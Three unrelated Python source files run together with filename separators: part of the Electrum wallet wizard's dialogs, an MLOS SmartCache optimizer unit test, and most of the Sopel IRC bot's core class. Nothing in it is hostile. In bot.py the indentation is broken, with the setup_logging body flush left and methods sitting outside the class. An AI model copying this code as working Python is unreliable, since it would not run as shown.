            button.setMinimumWidth(150)
            hbox = QHBoxLayout()
            hbox.addWidget(button, alignment=Qt.AlignCenter)
            vbox.addLayout(hbox)
        self.exec_layout(vbox, title, next_enabled=test(default))
        return line.text()
    @wizard_dialog
    def show_xpub_dialog(self, xpub, run_next):
        """Display the wallet's master public key so it can be shared."""
        msg = ' '.join([
            _("Here is your master public key."),
            _("Please share it with your cosigners.")
        ])
        vbox = QVBoxLayout()
        layout = SeedLayout(
            xpub,
            title=msg,
            icon=False,
            for_seed_words=False,
            config=self.config,
        )
        vbox.addLayout(layout.layout())
        self.exec_layout(vbox, _('Master Public Key'))
        return None
    def init_network(self, network: 'Network'):
        """Ask how to pick a server (auto vs manual) and persist the choice."""
        message = _("Electrum communicates with remote servers to get "
                    "information about your transactions and addresses. The "
                    "servers all fulfill the same purpose only differing in "
                    "hardware. In most cases you simply want to let Electrum "
                    "pick one at random. However if you prefer feel free to "
                    "select a server manually.")
        choices = [_("Auto connect"), _("Select server manually")]
        title = _("How do you want to connect to a server? ")
        clayout = ChoicesLayout(message, choices)
        self.back_button.setText(_('Cancel'))
        self.exec_layout(clayout.layout(), title)
        r = clayout.selected_index()
        if r == 1:
            # manual selection: show the full network chooser
            nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
            if self.exec_layout(nlayout.layout()):
                nlayout.accept()
                self.config.set_key('auto_connect', network.auto_connect, True)
        else:
            network.auto_connect = True
            self.config.set_key('auto_connect', True, True)
    @wizard_dialog
    def multisig_dialog(self, run_next):
        """Ask for the multisig parameters via two sliders; return (m, n)."""
        cw = CosignWidget(2, 2)
        m_edit = QSlider(Qt.Horizontal, self)
        n_edit = QSlider(Qt.Horizontal, self)
        n_edit.setMinimum(2)
        n_edit.setMaximum(15)
        m_edit.setMinimum(1)
        m_edit.setMaximum(2)
        n_edit.setValue(2)
        m_edit.setValue(2)
        n_label = QLabel()
        m_label = QLabel()
        grid = QGridLayout()
        grid.addWidget(n_label, 0, 0)
        grid.addWidget(n_edit, 0, 1)
        grid.addWidget(m_label, 1, 0)
        grid.addWidget(m_edit, 1, 1)
        def on_m(m):
            m_label.setText(_('Require {0} signatures').format(m))
            cw.set_m(m)
            backup_warning_label.setVisible(cw.m != cw.n)
        def on_n(n):
            n_label.setText(_('From {0} cosigners').format(n))
            cw.set_n(n)
            # m can never exceed n
            m_edit.setMaximum(n)
            backup_warning_label.setVisible(cw.m != cw.n)
        n_edit.valueChanged.connect(on_n)
        m_edit.valueChanged.connect(on_m)
        vbox = QVBoxLayout()
        vbox.addWidget(cw)
        vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
        vbox.addLayout(grid)
        vbox.addSpacing(2 * char_width_in_lineedit())
        backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
                                         "you should include the master public key for each cosigner "
                                         "in all of your backups."))
        vbox.addWidget(backup_warning_label)
        on_n(2)
        on_m(2)
        self.exec_layout(vbox, _("Multi-Signature Wallet"))
        m = int(m_edit.value())
        n = int(n_edit.value())
        return (m, n)
|
TestSmartCacheWithRemoteOptimizerV2.py | #
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
import logging
import os
from threading import Thread
import unittest
from mlos.Logger import create_logger
from mlos.Examples.SmartCache import SmartCacheWorkloadGenerator, SmartCache
from mlos.Examples.SmartCache.TelemetryAggregators.WorkingSetSizeEstimator import WorkingSetSizeEstimator
from mlos.MlosOptimizationServices.MlosOptimizationServicesProxy import MlosOptimizationServicesProxy
from mlos.MlosOptimizationServices.ModelsDatabase.ConnectionString import ConnectionString
from mlos.Mlos.Infrastructure import CommunicationChannel, SharedConfig
from mlos.Mlos.SDK import mlos_globals, MlosGlobalContext, MlosExperiment, MlosAgent
from mlos.Mlos.SDK.CommonAggregators.Timer import Timer
from mlos.Optimizers.DistributableSimpleBayesianOptimizer import DistributableSimpleBayesianOptimizer
from mlos.Optimizers.OptimizationProblem import OptimizationProblem, Objective
from mlos.Spaces import Point, SimpleHypergrid, ContinuousDimension
import mlos.global_values as global_values
class TestSmartCacheWithRemoteOptimizer(unittest.TestCase):
    """ Tests SmartCache that's being tuned by the remote optimizer.
    This test will:
    1. Instantiate a SmartCache.
    2. Create an MlosExperiment that connects to a remote or in-process optimizer.
    3. Optimize the SmartCache with the help of the remote or in-process optimizer.
    """
    def setUp(self):
        # Start the global clock and a background agent thread that the
        # experiments below communicate with.
        mlos_globals.init_mlos_global_context()
        mlos_globals.mlos_global_context.start_clock()
        self.logger = create_logger('TestSmartCacheWithRemoteOptimizer')
        self.logger.level = logging.INFO
        self.mlos_agent = MlosAgent(
            logger=self.logger,
            communication_channel=mlos_globals.mlos_global_context.communication_channel,
            shared_config=mlos_globals.mlos_global_context.shared_config,
        )
        self.mlos_agent_thread = Thread(target=self.mlos_agent.run)
        self.mlos_agent_thread.start()
        global_values.declare_singletons() # TODO: having both globals and global_values is a problem
        self.workload_duration_s = 5
        # Let's add the allowed component types
        self.mlos_agent.add_allowed_component_type(SmartCache)
        self.mlos_agent.add_allowed_component_type(SmartCacheWorkloadGenerator)
        # Let's create the workload
        self.smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
        self.optimizer = None
        self.working_set_size_estimator = WorkingSetSizeEstimator()
        # Every 200ms, pull a new suggested configuration from the optimizer.
        self.cache_config_timer = Timer(
            timeout_ms=200,
            observer_callback=self._set_new_cache_configuration
        )
        self.smart_cache_experiment = MlosExperiment(
            smart_component_types=[SmartCache],
            telemetry_aggregators=[self.cache_config_timer, self.working_set_size_estimator]
        )
        self.optimization_problem = OptimizationProblem(
            parameter_space=SmartCache.parameter_search_space,
            objective_space=SimpleHypergrid(name="objectives", dimensions=[
                ContinuousDimension(name="miss_rate", min=0, max=1)
            ]),
            context_space=None, # TODO: add working set size estimate
            objectives=[Objective(name="miss_rate", minimize=True)]
        )
    def tearDown(self):
        mlos_globals.mlos_global_context.stop_clock()
        self.mlos_agent.stop_all()
    @unittest.skip(reason="SQL Server is not available in GCI at the moment.")
    def test_smart_cache_with_remote_optimizer_on_a_timer(self):
        """ Periodically invokes the optimizer to improve cache performance.
        """
        # Let's create an optimizer
        connection_string = ConnectionString.create_from_config_file(os.path.abspath(os.path.join(os.getcwd(), "Secrets", "local_connection_string.json")))
        global_values.ml_model_services_proxy = MlosOptimizationServicesProxy(models_database_connection_string=connection_string)
        self.optimizer = DistributableSimpleBayesianOptimizer.create_remote_model(
            models_database=global_values.ml_model_services_proxy.models_database,
            optimization_problem=self.optimization_problem
        )
        # NOTE(review): this TODO string is assigned but never used; it serves
        # only as an inline design note.
        TODO = """ There are so many things wrong here that an essay is in order.
        1. The entire DistributableSimpleBayesianOptimizer is to be thrown out.
        2. We need an Optimizer API that:
        1. Will be standard across many types of optimizers.
        2. Will let us specify:
        1. The search space
        2. The context space
        3. The target values
        We should generate client libraries along with MlosModelServices for Python and C# (at least). I suppose that's
        the next task after this test is turned on.
        """
        self.mlos_agent.start_experiment(self.smart_cache_experiment)
        # Let's launch the smart_cache_workload
        smart_cache_workload_thread = Thread(target=self.smart_cache_workload.run, args=(self.workload_duration_s,))
        smart_cache_workload_thread.start()
        smart_cache_workload_thread.join()
        self.mlos_agent.stop_experiment(self.smart_cache_experiment)
    def test_smart_cache_with_in_process_optimizer_on_a_timer2(self):
        """ Periodically invokes the optimizer to improve cache performance.
        """
        # Let's create an optimizer
        self.optimizer = DistributableSimpleBayesianOptimizer(
            optimization_problem=self.optimization_problem
        )
        self.mlos_agent.start_experiment(self.smart_cache_experiment)
        # Let's launch the smart_cache_workload
        smart_cache_workload_thread = Thread(target=self.smart_cache_workload.run, args=(self.workload_duration_s,))
        smart_cache_workload_thread.start()
        smart_cache_workload_thread.join()
        self.mlos_agent.stop_experiment(self.smart_cache_experiment)
    def _set_new_cache_configuration(self, elapsed_time_ms):
        """ This is where we would potentially query the optimizer.
        :param elapsed_time_ms:
        :return:
        """
        new_config_values = self.optimizer.suggest()
        new_config_values = Point(**new_config_values) # TODO: this Point() should not be necessary here
        self.mlos_agent.set_configuration(
            component_type=SmartCache,
            new_config_values=new_config_values
        )
        current_estimate = self.working_set_size_estimator.estimate_working_set_size()
        self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
|
bot.py | # coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
from ast import literal_eval
import collections
from datetime import datetime
import itertools
import logging
import re
import sys
import threading
import time
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
from sopel.tools import Identifier, deprecated
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
import sopel.loader
__all__ = ['Sopel', 'SopelWrapper']
LOGGER = logging.getLogger(__name__)
# Python 2/3 compatibility shim: on py3, alias the removed py2 builtins.
py3 = sys.version_info.major >= 3
if py3:
    unicode = str
    basestring = str
class Sopel(irc.AbstractBot):
    def __init__(self, config, daemon=False):
        """Initialize bot state: callables, plugin registry, channel/user maps,
        database, shared memory, and the job scheduler."""
        super(Sopel, self).__init__(config)
        self._daemon = daemon # Used for iPython. TODO something saner here
        self.wantsrestart = False
        # `re.compile('.*') is re.compile('.*')` because of caching, so we need
        # to associate a list with each regex, since they are unexpectedly
        # indistinct.
        self._callables = {
            'high': collections.defaultdict(list),
            'medium': collections.defaultdict(list),
            'low': collections.defaultdict(list)
        }
        self._plugins = {}
        self.doc = {}
        """A dictionary of command names to their documentation.
        Each command is mapped to its docstring and any available examples, if
        declared in the module's code.
        .. versionchanged:: 3.2
            Use the first item in each callable's commands list as the key,
            instead of the function name as declared in the source code.
        """
        self._command_groups = collections.defaultdict(list)
        """A mapping of module names to a list of commands in it."""
        self.stats = {} # deprecated, remove in 7.0
        self._times = {}
        """
        A dictionary mapping lowercased nicks to dictionaries which map
        function names to the time which they were last used by that nick.
        """
        self.server_capabilities = {}
        """A dict mapping supported IRCv3 capabilities to their options.
        For example, if the server specifies the capability ``sasl=EXTERNAL``,
        it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
        without any options will have ``None`` as the value.
        For servers that do not support IRCv3, this will be an empty set.
        """
        self.privileges = dict()
        """A dictionary of channels to their users and privilege levels.
        The value associated with each channel is a dictionary of
        :class:`sopel.tools.Identifier`\\s to
        a bitwise integer value, determined by combining the appropriate
        constants from :mod:`sopel.module`.
        .. deprecated:: 6.2.0
            Use :attr:`channels` instead. Will be removed in Sopel 8.
        """
        self.channels = tools.SopelMemory() # name to chan obj
        """A map of the channels that Sopel is in.
        The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
        and map to :class:`sopel.tools.target.Channel` objects which contain
        the users in the channel and their permissions.
        """
        self.users = tools.SopelMemory() # name to user obj
        """A map of the users that Sopel is aware of.
        The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
        map to :class:`sopel.tools.target.User` instances. In order for Sopel
        to be aware of a user, it must be in at least one channel which they
        are also in.
        """
        self.db = SopelDB(config)
        """The bot's database, as a :class:`sopel.db.SopelDB` instance."""
        self.memory = tools.SopelMemory()
        """
        A thread-safe dict for storage of runtime data to be shared between
        modules. See :class:`sopel.tools.SopelMemory`.
        """
        self.shutdown_methods = []
        """List of methods to call on shutdown."""
        self.scheduler = sopel.tools.jobs.JobScheduler(self)
        """Job Scheduler. See :func:`sopel.module.interval`."""
        # Set up block lists
        # Default to empty
        if not self.settings.core.nick_blocks:
            self.settings.core.nick_blocks = []
        if not self.settings.core.host_blocks:
            self.settings.core.host_blocks = []
    @property
    def command_groups(self):
        """A mapping of module names to a list of commands in it."""
        # This was supposed to be deprecated, but the help command uses this
        # (read-only view over the private _command_groups defaultdict)
        return self._command_groups
    @property
    def hostmask(self):
        """The current hostmask for the bot :class:`sopel.tools.target.User`.
        :return: the bot's current hostmask
        :rtype: str
        Bot must be connected and in at least one channel.
        """
        # self.users is only populated once connected and in a channel,
        # hence the explicit guard with a descriptive KeyError.
        if not self.users or self.nick not in self.users:
            raise KeyError("'hostmask' not available: bot must be connected and in at least one channel.")
        return self.users.get(self.nick).hostmask
    def setup(self):
        """Set up Sopel bot before it can run
        The setup phase manages to:
        * setup logging (configure Python's built-in :mod:`logging`),
        * setup the bot's plugins (load, setup, and register)
        * start the job scheduler
        """
        # Order matters: logging first, so plugin loading can be logged.
        self.setup_logging()
        self.setup_plugins()
        self.scheduler.start()
def setup_logging(self):
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
    def setup_plugins(self):
        """Load, set up, and register all enabled plugins, logging a summary."""
        load_success = 0
        load_error = 0
        load_disabled = 0
        LOGGER.info('Loading plugins...')
        usable_plugins = plugins.get_usable_plugins(self.settings)
        for name, info in usable_plugins.items():
            plugin, is_enabled = info
            if not is_enabled:
                load_disabled = load_disabled + 1
                continue
            try:
                plugin.load()
            except Exception as e:
                load_error = load_error + 1
                LOGGER.exception('Error loading %s: %s', name, e)
            else:
                try:
                    if plugin.has_setup():
                        plugin.setup(self)
                    plugin.register(self)
                except Exception as e:
                    load_error = load_error + 1
                    LOGGER.exception('Error in %s setup: %s', name, e)
                else:
                    load_success = load_success + 1
                    LOGGER.info('Plugin loaded: %s', name)
        total = sum([load_success, load_error, load_disabled])
        if total and load_success:
            LOGGER.info(
                'Registered %d plugins, %d failed, %d disabled',
                # NOTE(review): the -1 presumably excludes an always-loaded
                # built-in plugin from the user-facing count — confirm.
                (load_success - 1),
                load_error,
                load_disabled)
        else:
            LOGGER.warning("Warning: Couldn't load any plugins")
def reload_plugin(self, name):
    """Reload a plugin

    :param str name: name of the plugin to reload
    :raise PluginNotRegistered: when there is no ``name`` plugin registered

    Runs the plugin's shutdown routine and unregisters it, then reloads
    it, runs its setup routine, and registers it again.
    """
    if not self.has_plugin(name):
        raise plugins.exceptions.PluginNotRegistered(name)

    target = self._plugins[name]

    # Shut the old version down before swapping it out.
    target.shutdown(self)
    target.unregister(self)
    LOGGER.info('Unloaded plugin %s', name)

    # Bring the fresh version up.
    target.reload()
    target.setup(self)
    target.register(self)
    LOGGER.info('Reloaded plugin %s', name)
def reload_plugins(self):
    """Reload all plugins

    First runs every plugin's shutdown routine and unregisters them all;
    then reloads, sets up, and re-registers each one.
    """
    snapshot = list(self._plugins.items())

    # Phase 1: tear everything down.
    for plugin_name, plugin in snapshot:
        plugin.shutdown(self)
        plugin.unregister(self)
        LOGGER.info('Unloaded plugin %s', plugin_name)

    # Phase 2: reload and bring everything back up.
    for plugin_name, plugin in snapshot:
        plugin.reload()
        plugin.setup(self)
        plugin.register(self)
        LOGGER.info('Reloaded plugin %s', plugin_name)
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
    """Add a loaded plugin to the bot's registry.

    Stores the plugin object under its name, then registers all of its
    callables, jobs, shutdown methods, and URL callbacks.
    """
    self._plugins[plugin.name] = plugin
    self.register(callables, jobs, shutdowns, urls)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
    """Remove a loaded plugin from the bot's registry.

    :raise PluginNotRegistered: when the plugin is not registered

    Unregisters every callable, job, and shutdown function, removes any
    URL callbacks the plugin registered, then drops the plugin object.
    """
    name = plugin.name
    if not self.has_plugin(name):
        raise plugins.exceptions.PluginNotRegistered(name)
    # remove commands, jobs, and shutdown functions
    for func in itertools.chain(callables, jobs, shutdowns):
        self.unregister(func)
    # remove URL callback handlers
    if "url_callbacks" in self.memory:
        for func in urls:
            regexes = func.url_regex
            for regex in regexes:
                # Only unregister patterns still pointing at this plugin's
                # function, in case another plugin re-registered the regex.
                if func == self.memory['url_callbacks'].get(regex):
                    self.unregister_url_callback(regex)
                    LOGGER.debug('URL Callback unregistered: %r', regex)
    # remove plugin from registry
    del self._plugins[name]
def has_plugin(self, name):
    """Tell whether a plugin with this ``name`` is registered with the bot."""
    registered = self._plugins
    return name in registered
def unregister(self, obj):
    """Unregister a callable.

    :param obj: the callable to unregister
    :type obj: :term:`object`

    Removes the callable from the rule registry, the job scheduler, and
    the shutdown-method list, as applicable. Non-callables are ignored
    with a warning.
    """
    if not callable(obj):
        LOGGER.warning('Cannot unregister obj %r: not a callable', obj)
        return
    callable_name = getattr(obj, "__name__", 'UNKNOWN')

    if hasattr(obj, 'rule'):  # commands and intents have it added
        for rule in obj.rule:
            callb_list = self._callables[obj.priority][rule]
            if obj in callb_list:
                callb_list.remove(obj)
                # BUG FIX: the format string had a single "%s" but two
                # arguments (callable_name AND rule.pattern), which makes
                # logging raise a formatting error internally. Add the
                # second placeholder, matching register()'s message style.
                LOGGER.debug(
                    'Rule callable "%s" unregistered for "%s"',
                    callable_name,
                    rule.pattern)

    if hasattr(obj, 'interval'):
        self.scheduler.remove_callable_job(obj)
        LOGGER.debug('Job callable removed: %s', callable_name)

    if callable_name == "shutdown" and obj in self.shutdown_methods:
        self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
    """Register rules, jobs, shutdown methods, and URL callbacks.

    :param callables: an iterable of callables to register
    :type callables: :term:`iterable`
    :param jobs: an iterable of functions to periodically invoke
    :type jobs: :term:`iterable`
    :param shutdowns: an iterable of functions to call on shutdown
    :type shutdowns: :term:`iterable`
    :param urls: an iterable of functions to call when matched against a URL
    :type urls: :term:`iterable`

    The ``callables`` argument contains a list of "callable objects", i.e.
    objects for which :func:`callable` will return ``True``. They can be:

    * a callable with rules (will match triggers with a regex pattern)
    * a callable without rules (will match any triggers, such as events)
    * a callable with commands
    * a callable with nick commands
    * a callable with action commands

    It is possible to have a callable with rules, commands, and nick
    commands configured. It should not be possible to have a callable with
    commands or nick commands but without rules. Callables without rules
    are usually event handlers.
    """
    # Append module's shutdown function to the bot's list of functions to
    # call on shutdown
    self.shutdown_methods += shutdowns

    # Callables with no rule at all are filed under a catch-all pattern.
    match_any = re.compile('.*')
    for callbl in callables:
        callable_name = getattr(callbl, "__name__", 'UNKNOWN')
        rules = getattr(callbl, 'rule', [])
        commands = getattr(callbl, 'commands', [])
        nick_commands = getattr(callbl, 'nickname_commands', [])
        action_commands = getattr(callbl, 'action_commands', [])
        events = getattr(callbl, 'event', [])
        # A rule-only callable gets its own debug line per rule; callables
        # that also carry commands are logged by category below instead.
        is_rule_only = rules and not commands and not nick_commands

        if rules:
            for rule in rules:
                self._callables[callbl.priority][rule].append(callbl)
                if is_rule_only:
                    # Command & Nick Command are logged later:
                    # here we log rule only callable
                    LOGGER.debug(
                        'Rule callable "%s" registered for "%s"',
                        callable_name,
                        rule.pattern)
            if commands:
                LOGGER.debug(
                    'Command callable "%s" registered for "%s"',
                    callable_name,
                    '|'.join(commands))
            if nick_commands:
                LOGGER.debug(
                    'Nick command callable "%s" registered for "%s"',
                    callable_name,
                    '|'.join(nick_commands))
            if action_commands:
                LOGGER.debug(
                    'Action command callable "%s" registered for "%s"',
                    callable_name,
                    '|'.join(action_commands))
            if events:
                LOGGER.debug(
                    'Event callable "%s" registered for "%s"',
                    callable_name,
                    '|'.join(events))
        else:
            # No rules: register under the catch-all pattern.
            self._callables[callbl.priority][match_any].append(callbl)
            if events:
                LOGGER.debug(
                    'Event callable "%s" registered '
                    'with "match any" rule for "%s"',
                    callable_name,
                    '|'.join(events))
            else:
                LOGGER.debug(
                    'Rule callable "%s" registered with "match any" rule',
                    callable_name)

        if commands:
            module_name = callbl.__module__.rsplit('.', 1)[-1]
            # TODO doc and make decorator for this. Not sure if this is how
            # it should work yet, so not making it public for 6.0.
            category = getattr(callbl, 'category', module_name)
            self._command_groups[category].append(commands[0])

        # Record help documentation for each command of this callable.
        for command, docs in callbl._docs.items():
            self.doc[command] = docs

    # Schedule periodic jobs, one Job per declared interval.
    for func in jobs:
        for interval in func.interval:
            job = sopel.tools.jobs.Job(interval, func)
            self.scheduler.add_job(job)
            callable_name = getattr(func, "__name__", 'UNKNOWN')
            LOGGER.debug(
                'Job added "%s", will run every %d seconds',
                callable_name,
                interval)

    # Register URL callbacks, one entry per declared regex.
    for func in urls:
        for regex in func.url_regex:
            self.register_url_callback(regex, func)
            callable_name = getattr(func, "__name__", 'UNKNOWN')
            LOGGER.debug(
                'URL Callback added "%s" for URL pattern "%s"',
                callable_name,
                regex)
@deprecated
def msg(self, recipient, text, max_messages=1):
    """Send ``text`` to ``recipient`` (deprecated alias).

    .. deprecated:: 6.0
        Use :meth:`say` instead. Will be removed in Sopel 8.
    """
    # Note the argument order swap: say() takes (text, recipient).
    self.say(text, recipient, max_messages)
def call(self, func, sopel, trigger):
    """Call a function, applying any rate-limiting or restrictions.

    :param func: the function to call
    :type func: :term:`function`
    :param sopel: a SopelWrapper instance
    :type sopel: :class:`SopelWrapper`
    :param Trigger trigger: the Trigger object for the line from the server
                            that triggered this call

    Three rate limits are enforced (per-user, global, per-channel), then
    channel-specific plugin/command disabling from the config, and only
    then is ``func`` invoked. Exceptions from ``func`` are routed to
    :meth:`error`. A return of ``NOLIMIT`` prevents the call from being
    counted against the rate limits.
    """
    nick = trigger.nick
    current_time = time.time()
    # Ensure the per-nick / global / per-channel timestamp maps exist.
    if nick not in self._times:
        self._times[nick] = dict()
    if self.nick not in self._times:
        self._times[self.nick] = dict()
    if not trigger.is_privmsg and trigger.sender not in self._times:
        self._times[trigger.sender] = dict()

    # Admins and unblockable callables bypass all rate limits.
    if not trigger.admin and not func.unblockable:
        if func in self._times[nick]:
            usertimediff = current_time - self._times[nick][func]
            if func.rate > 0 and usertimediff < func.rate:
                LOGGER.info(
                    "%s prevented from using %s in %s due to user limit: %d < %d",
                    trigger.nick, func.__name__, trigger.sender, usertimediff,
                    func.rate
                )
                return

        # Global limit is tracked under the bot's own nick.
        if func in self._times[self.nick]:
            globaltimediff = current_time - self._times[self.nick][func]
            if func.global_rate > 0 and globaltimediff < func.global_rate:
                LOGGER.info(
                    "%s prevented from using %s in %s due to global limit: %d < %d",
                    trigger.nick, func.__name__, trigger.sender, globaltimediff,
                    func.global_rate
                )
                return

        if not trigger.is_privmsg and func in self._times[trigger.sender]:
            chantimediff = current_time - self._times[trigger.sender][func]
            if func.channel_rate > 0 and chantimediff < func.channel_rate:
                LOGGER.info(
                    "%s prevented from using %s in %s due to channel limit: %d < %d",
                    trigger.nick, func.__name__, trigger.sender, chantimediff,
                    func.channel_rate
                )
                return

    # if channel has its own config section, check for excluded modules/modules methods
    if trigger.sender in self.config:
        channel_config = self.config[trigger.sender]

        # disable listed modules completely on provided channel
        if 'disable_modules' in channel_config:
            disabled_modules = channel_config.disable_modules.split(',')

            # if "*" is used, we are disabling all modules on provided channel
            if '*' in disabled_modules:
                return
            if func.__module__ in disabled_modules:
                return

        # disable chosen methods from modules
        if 'disable_commands' in channel_config:
            # config value is a literal Python dict: {module: [names]}
            disabled_commands = literal_eval(channel_config.disable_commands)

            if func.__module__ in disabled_commands:
                if func.__name__ in disabled_commands[func.__module__]:
                    return

    try:
        exit_code = func(sopel, trigger)
    except Exception as error:  # TODO: Be specific
        exit_code = None
        self.error(trigger, exception=error)

    # NOLIMIT means "don't count this invocation against the rate limits".
    if exit_code != NOLIMIT:
        self._times[nick][func] = current_time
        self._times[self.nick][func] = current_time
        if not trigger.is_privmsg:
            self._times[trigger.sender][func] = current_time
def dispatch(self, pretrigger):
    """Dispatch a parsed message to any registered callables.

    :param PreTrigger pretrigger: a parsed message from the server

    For each priority tier (high, medium, low), match the message text
    against every registered rule; for each matching callable, check its
    event list, intent patterns, echo-message flag, and nick/host blocks
    before invoking it (in a thread when ``func.thread`` is set).
    """
    args = pretrigger.args
    text = args[-1] if args else ''
    event = pretrigger.event
    intent = pretrigger.tags.get('intent')
    nick = pretrigger.nick
    # A message from the bot's own nick is an "echo message".
    is_echo_message = nick.lower() == self.nick.lower()

    user_obj = self.users.get(nick)
    account = user_obj.account if user_obj else None

    # Only compute block status when blocking is configured at all.
    if self.config.core.nick_blocks or self.config.core.host_blocks:
        nick_blocked = self._nick_blocked(pretrigger.nick)
        host_blocked = self._host_blocked(pretrigger.host)
    else:
        nick_blocked = host_blocked = None
    blocked = bool(nick_blocked or host_blocked)

    list_of_blocked_functions = []
    for priority in ('high', 'medium', 'low'):
        for regexp, funcs in self._callables[priority].items():
            match = regexp.match(text)
            if not match:
                continue
            for func in funcs:
                trigger = Trigger(self.config, pretrigger, match, account)

                # check event
                if event not in func.event:
                    continue

                # check intents
                if hasattr(func, 'intents'):
                    if not intent:
                        continue

                    match = any(
                        func_intent.match(intent)
                        for func_intent in func.intents
                    )

                    if not match:
                        continue

                # check echo-message feature
                if is_echo_message and not func.echo:
                    continue

                # check blocked nick/host
                # done after we know the trigger would have matched so we
                # don't spam logs with "prevented from using" entries about
                # functions that weren't going to run anyway
                if blocked and not func.unblockable and not trigger.admin:
                    function_name = "%s.%s" % (
                        func.__module__, func.__name__
                    )
                    list_of_blocked_functions.append(function_name)
                    continue

                # call triggered function
                wrapper = SopelWrapper(self, trigger)
                if func.thread:
                    targs = (func, wrapper, trigger)
                    t = threading.Thread(target=self.call, args=targs)
                    t.start()
                else:
                    self.call(func, wrapper, trigger)

    # One summary log line for everything that was blocked.
    if list_of_blocked_functions:
        if nick_blocked and host_blocked:
            block_type = 'both'
        elif nick_blocked:
            block_type = 'nick'
        else:
            block_type = 'host'
        LOGGER.info(
            "[%s]%s prevented from using %s.",
            block_type,
            nick,
            ', '.join(list_of_blocked_functions)
        )
def on_scheduler_error(self, scheduler, exc):
    """Called when the Job Scheduler fails.

    Routes the exception through the bot's generic error handler.

    .. seealso::
        :meth:`error`
    """
    self.error(exception=exc)

def on_job_error(self, scheduler, job, exc):
    """Called when a job from the Job Scheduler fails.

    Routes the exception through the bot's generic error handler.

    .. seealso::
        :meth:`error`
    """
    self.error(exception=exc)
def error(self, trigger=None, exception=None):
    """Called internally when a plugin causes an error.

    Builds a human-readable message from the optional ``exception`` and
    ``trigger``, logs it with traceback, and — when configured via
    ``core.reply_errors`` — echoes it back to the triggering channel/nick.
    """
    message = 'Unexpected error'
    if exception:
        message = '{} ({})'.format(message, exception)
    if trigger:
        message = '{} from {} at {}. Message was: {}'.format(
            message, trigger.nick, str(datetime.now()), trigger.group(0)
        )
    LOGGER.exception(message)
    if trigger and self.settings.core.reply_errors and trigger.sender is not None:
        self.say(message, trigger.sender)
def _host_blocked(self, host):
    """Return True when ``host`` matches any configured host block.

    Each configured entry is treated as a regex anchored at the end of
    the host (case-insensitive); an exact string match also counts.
    """
    for raw_mask in self.config.core.host_blocks:
        mask = raw_mask.strip()
        if not mask:
            continue
        if mask == host or re.match(mask + '$', host, re.IGNORECASE):
            return True
    return False
def _nick_blocked(self, nick):
    """Return True when ``nick`` matches any configured nick block.

    Each configured entry is treated as a regex anchored at the end of
    the nick (case-insensitive); an Identifier-equality match also counts.
    """
    for raw_entry in self.config.core.nick_blocks:
        pattern = raw_entry.strip()
        if not pattern:
            continue
        if Identifier(pattern) == nick or re.match(pattern + '$', nick, re.IGNORECASE):
            return True
    return False
def _shutdown(self):
    """Internal shutdown: stop the scheduler, then run plugin shutdowns.

    Every registered shutdown method is invoked exactly once; errors in
    one method never prevent the others from running.
    """
    # Stop Job Scheduler
    LOGGER.info('Stopping the Job Scheduler.')
    self.scheduler.stop()

    try:
        self.scheduler.join(timeout=15)
    except RuntimeError:
        LOGGER.exception('Unable to stop the Job Scheduler.')
    else:
        LOGGER.info('Job Scheduler stopped.')

    self.scheduler.clear_jobs()

    # Shutdown plugins
    LOGGER.info(
        'Calling shutdown for %d modules.', len(self.shutdown_methods))
    for shutdown_method in self.shutdown_methods:
        try:
            LOGGER.debug(
                'Calling %s.%s',
                shutdown_method.__module__,
                shutdown_method.__name__)
            shutdown_method(self)
        except Exception as e:
            LOGGER.exception('Error calling shutdown method: %s', e)

    # Avoid calling shutdown methods if we already have.
    self.shutdown_methods = []
def register_url_callback(self, pattern, callback):
    """Register a ``callback`` for URLs matching the regex ``pattern``.

    :param pattern: compiled regex pattern to register
    :type pattern: :ref:`re.Pattern <python:re-objects>`
    :param callback: callable object to handle matching URLs
    :type callback: :term:`function`

    .. versionadded:: 7.0

        This method replaces manual management of ``url_callbacks`` in
        Sopel's plugins, so instead of doing this in ``setup()``::

            if 'url_callbacks' not in bot.memory:
                bot.memory['url_callbacks'] = tools.SopelMemory()

            regex = re.compile(r'http://example.com/path/.*')
            bot.memory['url_callbacks'][regex] = callback

        use this much more concise pattern::

            regex = re.compile(r'http://example.com/path/.*')
            bot.register_url_callback(regex, callback)
    """
    if 'url_callbacks' not in self.memory:
        self.memory['url_callbacks'] = tools.SopelMemory()

    # A plain string pattern is compiled for the caller.
    if isinstance(pattern, basestring):
        pattern = re.compile(pattern)

    self.memory['url_callbacks'][pattern] = callback
def unregister_url_callback(self, pattern):
    """Unregister the callback for URLs matching the regex ``pattern``.

    :param pattern: compiled regex pattern to unregister callback
    :type pattern: :ref:`re.Pattern <python:re-objects>`

    .. versionadded:: 7.0

        This method replaces manual management of ``url_callbacks`` in
